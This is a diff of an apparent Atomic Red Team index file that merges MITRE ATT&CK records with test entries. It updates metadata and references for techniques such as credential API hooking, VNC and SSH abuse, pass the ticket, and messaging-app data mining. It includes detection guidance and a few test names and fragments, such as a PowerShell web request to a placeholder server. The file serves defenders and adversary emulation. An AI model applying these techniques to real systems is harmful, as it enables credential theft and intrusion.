+      - source_name: TrendMicro Exposed Redis 2020
+        description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+          Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+          September 25, 2024.
+        url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
       - source_name: Microsoft SharePoint Logging
         description: Microsoft. (2017, July 19). Configure audit settings for a site
           collection. Retrieved April 4, 2018.
@@ -69466,11 +70083,14 @@ collection:
         description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
           8, 2021.
         url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+      - source_name: Cybernews Reuters Leak 2022
+        description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+          and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+        url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1602.001:
     technique:
@@ -69507,7 +70127,7 @@ collection:
         description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
           of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
           19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T01:54:22.812Z'
       name: SNMP (MIB Dump)
       description: "Adversaries may target the Management Information Base (MIB) to
         collect and/or mine valuable information in a network managed using Simple
@@ -69539,80 +70159,10 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
-      type: attack-pattern
-      created: '2020-02-11T19:01:15.930Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1056.004
-        url: https://attack.mitre.org/techniques/T1056/004
-      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
-        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
-          Retrieved December 18, 2017.
-        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
-        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
-          December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
-        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
-        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
-          12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
-        description: Stack Exchange - Security. (2012, July 31). What are the methods
-          to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-27T21:03:56.385Z'
       name: 'Input Capture: Credential API Hooking'
       description: |
         Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -69625,23 +70175,89 @@ collection:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
 
         Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
 
         Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      created: '2020-02-11T19:01:15.930Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
+      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+          Retrieved December 18, 2017.
+        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+      - source_name: Microsoft Hook Overview
+        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+          December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
+        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
+        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+          12, 2017.
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
+        description: Stack Exchange - Security. (2012, July 31). What are the methods
+          to find hooked functions and APIs?. Retrieved December 12, 2017.
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1056.004
     atomic_tests:
     - name: Hook PowerShell TLS Encrypt/Decrypt Messages
@@ -69677,10 +70293,81 @@ collection:
           Invoke-WebRequest #{server_name} -UseBasicParsing
         name: powershell
         elevation_required: true
+  T1213.005:
+    technique:
+      modified: '2024-10-16T14:22:49.146Z'
+      name: Messaging Applications
+      description: "Adversaries may leverage chat and messaging applications, such
+        as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+        \ \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on messaging applications: \n\n*
+        Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+        \n* Source code snippets \n* Links to network shares and other internal resources
+        \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+        about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+        2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+        messaging applications, adversaries may leverage data from chat messages in
+        order to improve their targeting - for example, by learning more about an
+        environment or evading ongoing incident response efforts.(Citation: Sentinel
+        Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - Obsidian Security
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      - Office Suite
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+      created: '2024-08-30T13:50:42.023Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/005
+        external_id: T1213.005
+      - source_name: Sentinel Labs NullBulge 2024
+        description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+          as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+        url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+      - source_name: SC Magazine Ragnar Locker 2021
+        description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+          victims it can read the on-network incident response chat rooms. Retrieved
+          August 30, 2024.
+        url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+      - source_name: Guardian Grand Theft Auto Leak 2022
+        description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+          19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+          Retrieved August 30, 2024.'
+        url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+      - source_name: Microsoft DEV-0537
+        description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+          organizations for data exfiltration and destruction. Retrieved March 23,
+          2022.
+        url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
 lateral-movement:
   T1021.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:20:07.264Z'
       name: Remote Services:VNC
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
@@ -69691,6 +70378,7 @@ lateral-movement:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: lateral-movement
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
 
@@ -69700,7 +70388,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -69716,66 +70403,67 @@ lateral-movement:
       id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
       created: '2020-02-11T18:28:44.950Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1021/005
         external_id: T1021.005
-      - source_name: The Remote Framebuffer Protocol
-        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
-          Framebuffer Protocol. Retrieved September 20, 2021.
-        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: Attacking VNC Servers PentestLab
+        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+          VNC Servers. Retrieved October 6, 2021.
+        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
       - source_name: MacOS VNC software for Remote Desktop
         description: Apple Support. (n.d.). Set up a computer running VNC software
           for Remote Desktop. Retrieved August 18, 2021.
         url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
-      - source_name: VNC Authentication
-        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
-          September 20, 2021.
-        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
-      - source_name: Hijacking VNC
-        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
-          Access and Crack). Retrieved September 20, 2021.'
-        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+      - source_name: Havana authentication bug
+        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+          seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+        url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
       - source_name: macOS root VNC login without authentication
         description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
           root account without authentication. Retrieved September 20, 2021.
         url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
-      - source_name: VNC Vulnerabilities
-        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
-          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
-        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
       - source_name: Offensive Security VNC Authentication Check
         description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
           6, 2021.
         url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
-      - source_name: Attacking VNC Servers PentestLab
-        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
-          VNC Servers. Retrieved October 6, 2021.
-        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
-      - source_name: Havana authentication bug
-        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
-          seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
-        url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
-      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
-        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
-          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
-          August 19, 2021.'
-        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
       - source_name: Gnome Remote Desktop grd-settings
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
       - source_name: Gnome Remote Desktop gschema
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+          August 19, 2021.'
+        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+      - source_name: VNC Vulnerabilities
+        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+      - source_name: The Remote Framebuffer Protocol
+        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+          Framebuffer Protocol. Retrieved September 20, 2021.
+        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: VNC Authentication
+        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+          September 20, 2021.
+        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+      - source_name: Hijacking VNC
+        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+          Access and Crack). Retrieved September 20, 2021.'
+        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1021.005
     atomic_tests: []
   T1080:
     technique:
-      modified: '2023-05-31T12:33:20.915Z'
+      modified: '2024-10-15T16:07:36.903Z'
       name: Taint Shared Content
       description: |2-
 
@@ -69800,11 +70488,11 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
       - Linux
       - macOS
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Network Share: Network Share Access'
       - 'Process: Process Creation'
@@ -69827,9 +70515,8 @@ lateral-movement:
         url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.004:
     technique:
@@ -69880,7 +70567,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.004
     atomic_tests: []
   T1091:
@@ -69944,7 +70630,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests:
     - name: USB Malware Spread Simulation
@@ -70037,7 +70722,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.001:
     technique:
@@ -70074,7 +70758,7 @@ lateral-movement:
         url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
         description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
           11 security incident. Retrieved February 17, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-23T23:11:24.682Z'
       name: SSH Hijacking
       description: |-
         Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
@@ -70105,8 +70789,6 @@ lateral-movement:
       - root
       x_mitre_system_requirements:
       - SSH service enabled, trust relationships configured, established connections
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1021.002:
     technique:
@@ -70189,7 +70871,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.002
     atomic_tests:
     - name: Map admin share
@@ -70314,7 +70995,7 @@ lateral-movement:
         elevation_required: true
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -70341,6 +71022,7 @@ lateral-movement:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -70358,12 +71040,12 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -70389,14 +71071,13 @@ lateral-movement:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021:
     technique:
@@ -70514,7 +71195,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563:
     technique:
@@ -70568,11 +71248,10 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.006:
     technique:
-      modified: '2023-08-11T15:26:41.941Z'
+      modified: '2024-09-12T15:28:23.398Z'
       name: 'Remote Services: Windows Remote Management'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -70624,14 +71303,13 @@ lateral-movement:
           April 27, 2016.
         url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
       - source_name: Microsoft WinRM
-        description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa384426
+        description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.006
     atomic_tests:
     - name: Enable Windows Remote Management
@@ -70780,7 +71458,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.003
     atomic_tests:
     - name: PowerShell Lateral Movement using MMC20
@@ -70852,7 +71529,7 @@ lateral-movement:
           '
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -70872,6 +71549,7 @@ lateral-movement:
       x_mitre_contributors:
